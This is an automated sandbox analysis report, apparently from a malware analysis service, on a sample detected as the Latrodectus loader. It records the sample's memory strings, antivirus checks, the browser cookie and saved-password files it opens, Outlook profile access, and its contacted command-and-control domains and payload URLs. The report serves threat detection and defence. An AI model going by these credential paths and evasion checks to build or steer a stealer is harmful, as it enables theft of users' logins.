Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 3_2_0000000180049278
Source: Update_27361bf8.dll.4.dr Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe Binary or memory string: Progman
Source: rundll32.exe Binary or memory string: Program manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A304 GetSystemTimeAsFileTime, 3_2_000000018006A304
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C8AE0 GetUserNameA,wsprintfA, 4_2_00000237C16C8AE0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5879708 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 8_3_000001E3B5879708
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress, 3_2_0000000180040CB0
Source: C:\Windows\System32\nltest.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.9.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601666880.000001ABBC4D1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602672974.000001ABBBDAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002E.00000002.3602844676.000000800E378000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ndows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000002.3603092587.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602735400.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Files%\Windows Defender\MsMpeng.exe
Source: rundll32.exe Binary or memory string: 360tray.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: indows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002E.00000003.3602239295.000001ABBC4B1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602219141.000001ABBC4B0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602672974.000001ABBBDAE000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601495070.000001ABBBD86000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000002.3603064300.000001ABBBD89000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBD87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: Amcache.hve.9.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Latrodectus
Source: Yara match File source: 3.2.rundll32.exe.14614300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.146142f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.146142f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.14614300000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2008946508.00000237C16B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3178827371.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3440249504.000001E3B56E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3416817098.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3264216780.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3041610792.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2270295766.0000014614300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2008986338.00000237C16C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 180, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Remote Access Functionality
barindex
Yara detected Latrodectus
Source: Yara match File source: 3.2.rundll32.exe.14614300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.146142f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.146142f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.14614300000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2008946508.00000237C16B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3178827371.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3440249504.000001E3B56E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3416817098.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3264216780.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3041610792.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2270295766.0000014614300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2008986338.00000237C16C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 180, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432373 Sample: 360total.dll.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 77 pewwhranet.com 2->77 79 jarinamaers.shop 2->79 81 grizmotras.com 2->81 109 Found malware configuration 2->109 111 Multi AV Scanner detection for dropped file 2->111 113 Multi AV Scanner detection for submitted file 2->113 115 3 other signatures 2->115 12 loaddll64.exe 1 2->12         started        14 chrome.exe 9 2->14         started        signatures3 process4 dnsIp5 17 cmd.exe 1 12->17         started        20 rundll32.exe 12->20         started        22 conhost.exe 12->22         started        27 2 other processes 12->27 91 192.168.2.4 unknown unknown 14->91 93 192.168.2.5, 137, 138, 443 unknown unknown 14->93 95 239.255.255.250 unknown Reserved 14->95 24 chrome.exe 14->24         started        process6 dnsIp7 97 Uses net.exe to modify the status of services 17->97 99 Uses ipconfig to lookup or modify the Windows network settings 17->99 101 Performs a network lookup / discovery via net view 17->101 29 rundll32.exe 2 17->29         started        103 Contains functionality to compare user and computer (likely to detect sandboxes) 20->103 105 Contains functionality to detect sleep reduction / modifications 20->105 33 WerFault.exe 20 16 20->33         started        35 WerFault.exe 4 16 20->35         started        89 www.google.com 142.250.217.228, 443, 49712, 49713 GOOGLEUS United States 24->89 signatures8 process9 file10 75 C:\Users\user\AppData\...\Update_27361bf8.dll, PE32+ 29->75 dropped 125 Deletes itself after installation 29->125 37 rundll32.exe 22 29->37         started        signatures11 process12 dnsIp13 83 jarinamaers.shop 104.21.46.75, 443, 49745, 49746 CLOUDFLARENETUS United States 37->83 85 pewwhranet.com 104.21.84.207, 443, 49781, 49784 CLOUDFLARENETUS United States 37->85 87 grizmotras.com 172.67.219.28, 443, 49750, 49751 CLOUDFLARENETUS United States 37->87 117 System process connects to network (likely due to code injection or exploit) 37->117 119 Tries to steal Mail credentials (via file / registry access) 37->119 121 Tries to harvest and steal browser information (history, passwords, etc) 37->121 41 cmd.exe 1 37->41         started        43 cmd.exe 37->43         started        46 cmd.exe 37->46         started        48 8 other processes 37->48 signatures14 process15 signatures16 50 systeminfo.exe 2 1 41->50         started        53 conhost.exe 41->53         started        123 Performs a network lookup / discovery via net view 43->123 55 conhost.exe 43->55         started        57 net.exe 43->57         started        65 2 other processes 46->65 59 net.exe 48->59         started        61 net.exe 48->61         started        63 conhost.exe 48->63         started        67 12 other processes 48->67 process17 signatures18 107 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 50->107 69 WmiPrvSE.exe 50->69         started        71 net1.exe 59->71         started        73 net1.exe 61->73         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.217.228
 www.google.com United States
15169 GOOGLEUS false
104.21.46.75
 jarinamaers.shop United States
13335 CLOUDFLARENETUS true
172.67.219.28
 grizmotras.com United States
13335 CLOUDFLARENETUS true
239.255.255.250
 unknown Reserved
unknown unknown false
104.21.84.207
 pewwhranet.com United States
13335 CLOUDFLARENETUS true

Private

IP
192.168.2.4
192.168.2.5

Contacted Domains

Name IP Active
jarinamaers.shop 104.21.46.75 true
pewwhranet.com 104.21.84.207 true
grizmotras.com 172.67.219.28 true
www.google.com 142.250.217.228 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGOKysLEGIjDP9RPIyWXG6yqz56jt32vlp9eant7g-v2niK8akWf-XW5L6XSYUi8PVE7hkJBYZJgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
    		high
    https://www.google.com/async/newtab_promos false
      		high
      https://startmast.shop/live/ true
      • Avira URL Cloud: safe
      		 unknown
      https://jarinamaers.shop/files/stkm.bin true
      • Avira URL Cloud: safe
      		 unknown
      https://pewwhranet.com/live/ true
      • Avira URL Cloud: safe
      		 unknown
      https://www.google.com/async/ddljson?async=ntp:2 false
        		high
        https://grizmotras.com/live/ true
        • Avira URL Cloud: safe
        		 unknown
        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
          		high
          https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGOKysLEGIjCpcmGUPeBLMAxrx6A3m-HmimiV3M4DW_xd1u12h5Ub_NV02_HrDnvzsp-9u9svldcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
            		high
            https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
              		high
              https://jarinamaers.shop/live/ true
              • Avira URL Cloud: safe
              		 unknown